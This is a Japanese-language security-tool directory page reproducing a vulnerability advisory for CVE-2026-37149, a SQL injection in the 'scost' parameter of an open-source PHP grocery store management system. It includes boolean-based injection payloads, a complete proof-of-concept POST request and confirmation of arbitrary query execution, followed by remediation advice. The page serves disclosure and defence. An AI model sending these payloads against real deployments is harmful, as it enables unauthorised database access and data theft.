Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-37149 — CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 の search_products.php の scost パラメータにおけるSQLインジェクションの脆弱性 | Kitploit
ツール/GitHubGitHub/pateldhyeyit/cve-2026-37149
脆弱性分析ウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育データベースセキュリティ
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 の search_products.php の scost パラメータにおけるSQLインジェクションの脆弱性

リポジトリを見る
22ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-37149 SQLインジェクション in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0

概要

CVE ID: CVE-2026-37149
脆弱性タイプ: SQLインジェクション (CWE-89)
重要度: 高
発見者: Dhyey Patel

説明

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 には、"/grocery/search_products.php" の "scost" パラメータにSQLインジェクションの脆弱性が存在します。

アプリケーションは、ユーザーからの入力をSQLクエリに埋め込む前に適切に検証していません。攻撃者は脆弱なパラメータを通じて細工されたSQL式を注入し、バックエンドのデータベースクエリを操作できます。

悪用に成功すると、機密データベース情報への不正アクセスや任意のSQL文の実行が可能となります。

影響を受ける製品

製品: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
バージョン: v1.0
ベンダーリポジトリ:
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

影響を受けるコンポーネント

  • "/grocery/search_products.php"
  • POSTパラメータ: "scost"

攻撃タイプ
リモート

ベンダー情報
リポジトリ所有者によって維持されているオープンソースプロジェクト:
https://github.com/anirudhkannanvp

技術的詳細

この脆弱性は、ブールベースのSQLインジェクション手法を用いて確認されました。

真条件ペイロード

-1 OR 321=6 AND 000483=000483 --

偽条件ペイロード

-1 OR 320=6 AND 000483=000483 --

注入された条件がTRUEまたはFALSEと評価された場合にアプリケーションの応答が異なり、SQLインジェクションが確認されました。

さらにテストを実施し、以下のSQL関数の実行に成功しました:

SELECT database()

返されたデータベース名:

grocery

これは、脆弱なパラメータを通じて任意のSQLクエリが実行可能であることを示しています。

概念実証

リクエスト

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

結果

注入されたブール条件に応じて応答が変化し、"scost" パラメータにおけるSQLインジェクションが確認されました。

影響

潜在的な影響は以下の通りです:

  • データベースの列挙
  • 機密情報の漏洩
  • 認証バイパス
  • データの抽出
  • データベースレコードの改変

対策

開発者は以下の対策を実施すべきです:

  1. プリペアドステートメントを使用する。
  2. パラメータ化されたSQLクエリを使用する。
  3. 数値入力パラメータを検証する。
  4. サーバー側の入力検証を実装する。
  5. ユーザー制御の入力をSQL文に直接連結しない。

参考文献
OWASP SQLインジェクション
https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVEプログラム
https://www.cve.org

クレジット
発見および報告者:
Dhyey Patel

ツールをダウンロード